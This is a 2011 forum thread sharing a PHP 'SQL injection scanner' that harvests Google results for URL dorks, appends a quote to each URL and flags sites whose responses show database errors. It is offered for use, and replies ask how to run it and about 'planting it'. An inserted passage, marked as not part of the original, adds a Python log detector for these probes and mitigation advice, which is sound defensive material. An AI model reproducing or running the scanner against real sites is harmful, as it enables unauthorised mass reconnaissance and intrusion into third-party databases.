Malaysian WackWall Forum

Now Malaysian Can Connect Over The World
 
 SQL Injection Scanner By XShimeX

wackwall
Admin



PostSubject: SQL Injection Scanner By XShimeX   Mon Feb 28, 2011 1:50 pm

SQL Injection Scanner By XShimeX

Code:
<?php
  /**
    * SQL Injection Scanner
    * PHP Version By XShimeX
    * Version 1.0
    * Thanks To: TBDSecurity.Com, HMSecurity.org, All my friends, And ALLAH.
  */
  set_time_limit(0);
 
  $vuln = 0;
  $not_vuln = 0;
  $total = 0;
 
  print "[+] SQL Injection Scanner PHP Version\n";
  print "[+] Version 1.0 By XShimeX\n";
 
  if(!$argv[1]) {
      print "[%] Usage: $argv[0] <dork>\n";
      print "[%] Example : $argv[0] inurl:news.php?id=\n
      Sqli Dork by MR lock a.k.a haikalxy
inurl:title.php?id= ";
      exit;
  }
 
  /**
  * SQL Bug(syntax error) takes from here: http://www.darkc0de.com/others/devilzc0de.py
  */
 
  $bug = array(
  'You have an error in your SQL','Division by zero in',
  'supplied argument is not a valid MySQL result resource in',
  'Call to a member function','Microsoft JET Database',
  'ODBC Microsoft Access Driver',
  'Microsoft OLE DB Provider for SQL Server',
  'Unclosed quotation mark',
  'Microsoft OLE DB Provider for Oracle',
  'Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect',
  'Incorrect syntax near'
  );
 
  print "[@] Start Finding Links...\n";
  for($i = 0; $i <= 900; $i += 100) {
      $fp = @file_get_contents("http://www.google.com/search?q=$argv[1]&num=100&hl=en&as_qdr=all&start=$i&sa=N");
      @preg_match_all("/<h3 class=(.*?)><a href="(.*?)" class=(.*?)>/", $fp, $links);
      $url[] = $links[2];
  }
  print "[@] Done Finding Links...\n";
  print "[@] Now searching for Vulnerable\n";
  foreach($url as $key) {
      foreach($key as $value) {
        $fp = @file_get_contents($value."'");
        foreach($bug as $error) {
            if(@preg_match("/$error/", $fp)) {
              print "[#] Posibble SQL Injection: $value'\n";
              $vuln++;
            } else {
              $not_vuln++;
            }
        $total++;
        }
      }
  }
  print "[@] Done Scanning\n";
  print "[%] Result\n";
  print "[-] Total Vulnerable: $vuln\n";
  print "[-] Total Not Vulnerable : $not_vuln\n";
  print "[-] Total scanned Website: $total\n";
  print "Enjoy :)\n";
 
?>

Thanks,

wackwall
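
Added example, not part of the original post or of XShimeX's script: the scanner above requests each URL with a single quote appended and looks for database error text in the response, so its probes have a recognisable shape in a site's own access logs. The Python code below flags clients that send trailing-quote requests to several distinct paths; the Combined Log Format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def is_quote_probe(target):
    """True when the decoded query string ends in a single quote,
    the shape of request the scanner above sends (URL + "'")."""
    query = urlsplit(target).query
    if not query:
        return False
    return unquote(query).endswith("'")

def find_quote_probes(lines, min_paths=2):
    """Return {client_ip: sorted distinct paths probed} for clients that
    sent trailing-quote requests to at least min_paths distinct paths."""
    probes = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in Combined Log Format
        ip, _method, target, _status = m.groups()
        if is_quote_probe(target):
            probes[ip].add(urlsplit(target).path)
    return {ip: sorted(p) for ip, p in probes.items() if len(p) >= min_paths}

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [24/Oct/2011:18:22:01 +0800] "GET /news.php?id=12\' HTTP/1.0" 200 512 "-" "-"',
    '203.0.113.7 - - [24/Oct/2011:18:22:02 +0800] "GET /view.php?id=3%27 HTTP/1.0" 500 87 "-" "-"',
    '198.51.100.4 - - [24/Oct/2011:18:23:10 +0800] "GET /news.php?id=12 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    # A legitimate apostrophe inside a value is not a trailing-quote probe.
    '198.51.100.4 - - [24/Oct/2011:18:23:15 +0800] "GET /search.php?q=o%27brien&page=2 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, paths in find_quote_probes(SAMPLE).items():
        print(ip, "sent trailing-quote requests to", paths)
```

Detection aside, the mitigation is parameterized queries and keeping database error text out of HTTP responses, which removes both the injection point and the error strings this scanner matches on.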
ej22s




PostSubject: sql injection   Sat Oct 01, 2011 7:23 pm

Sorry for asking, I am a noob in this area but not in hacking with software. I have gone through this code and it is excellent, but how do I use it? Please can you send me the instructions to my email @ eji.ayanga @ gmail.com

You are doing a wonderful job.

Thank you.
sucide_bomber
New User

PostSubject: Re: SQL Injection Scanner By XShimeX   Mon Oct 24, 2011 6:22 pm

Nice... have you tested planting it yet, bro...